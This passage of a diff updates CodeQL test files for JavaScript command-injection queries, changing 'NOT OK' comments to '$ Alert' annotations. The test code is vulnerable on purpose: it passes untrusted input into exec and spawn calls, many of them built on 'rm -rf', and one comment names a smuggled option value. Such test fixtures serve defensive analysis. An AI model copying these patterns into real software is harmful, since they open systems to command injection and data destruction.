exec("touch " + fields.name); // $ Alert }); }); @@ -50,13 +50,13 @@ http.createServer(function (req, res) { var form = new multiparty.Form(); form.parse(req, function (err, fields, files) { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..a606c9166175 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -4,32 +4,32 @@ var http = require("http"), var server = http.createServer(function (req, res) { let cmd = url.parse(req.url, true).query.path; - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..74301997e38c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } test(process.env); -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fd1e9cdd9f97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -1,36 +1,36 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { const args = process.argv.slice(2); const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line @@ -38,9 +38,9 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .option('verbose', { foo: "bar" }) .argv - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { @@ -52,7 +52,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert var tainted1 = require('yargs').argv; var tainted2 = require('yargs').parse() @@ -62,34 +62,34 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + cp.exec("cmd.sh " + taint3); // $ Alert var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { const argv = process.argv.slice(2); var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,13 +99,13 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { @@ -113,7 +113,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const cli = meow(`helpstring`, {flags: {...flags}}); - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { @@ -121,20 +121,20 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK var opts = dashdash.parse({options: options}); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); var opts = parser.parse(); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { const { program } = require('commander'); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..16ace6a020f6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -4,18 +4,18 @@ const { execFile } = require("child_process"); app.get("/", (req, res) => { const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert const myArgs = req.query.args; - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code @@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..5b58e1afe4f2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -3,5 +3,5 @@ const cp = require("child_process"); module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..c7e35029966b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,30 +1,30 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function cla() { } cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports = new cla(); function cla2() { } cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.bla = new cla2(); @@ -32,29 +32,29 @@ module.exports.lib2 = require("./lib2.js") class Cla3 { constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } bar(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. + require("mz/child_process").exec("rm -rf " + name); // $ Alert } module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. + var cmd1 = "rm -rf " + name; // $ Alert cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert function myExec(cmd) { cp.exec(cmd); } @@ -62,73 +62,73 @@ module.exports.flow = function (name) { } module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. + cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { wha(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static bla(name) { @@ -146,7 +146,7 @@ function Cla5(name) { module.exports.cla5 = new Cla5(); module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK + let cmd = "rm -rf " + name; // $ Alert let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); @@ -156,7 +156,7 @@ module.exports.indirect2 = function (name) { let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); let cmd2 = "rm -rf " + name; var args2 = [cmd2]; @@ -168,64 +168,64 @@ module.exports.indirect2 = function (name) { } module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + cp.exec("rm -rf " + broken); // $ Alert } var path = require("path"); module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -246,39 +246,39 @@ var cleanInput = function (s) { } module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK + cp.exec("rm -rf " + obj.version); // $ Alert obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + cp.exec("rm -rf " + opts.bla); // $ Alert this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert } } @@ -305,24 +305,24 @@ function sanitizeShellString(str) { } module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK + cp.exec("rm -rf " + id(n)); // $ Alert }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert } Object.defineProperty(module.exports, "boundProblem", { @@ -363,7 +363,7 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK + var command = "learn " + this.learn_args + " " + model; // $ Alert cp.exec(command); } }; @@ -403,27 +403,27 @@ function yetAnohterSanitizer(str) { } module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK + arr.push(name); // $ Alert spawn("rm", arr, SPAWN_OPT); spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. } @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } const myFuncs = { myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } }; @@ -475,12 +475,12 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK + let args = ' my name is ' + name; // $ Alert let cmd = 'echo'; cp.exec(cmd + args); } @@ -496,7 +496,7 @@ module.exports.myCommand = function (myCommand) { }; module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + MyThing.cp.exec("rm -rf " + name); // $ Alert } }); @@ -507,49 +507,49 @@ for (var name in imp){ } module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.shellThing = function (name) { function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } indirectShell("rm", 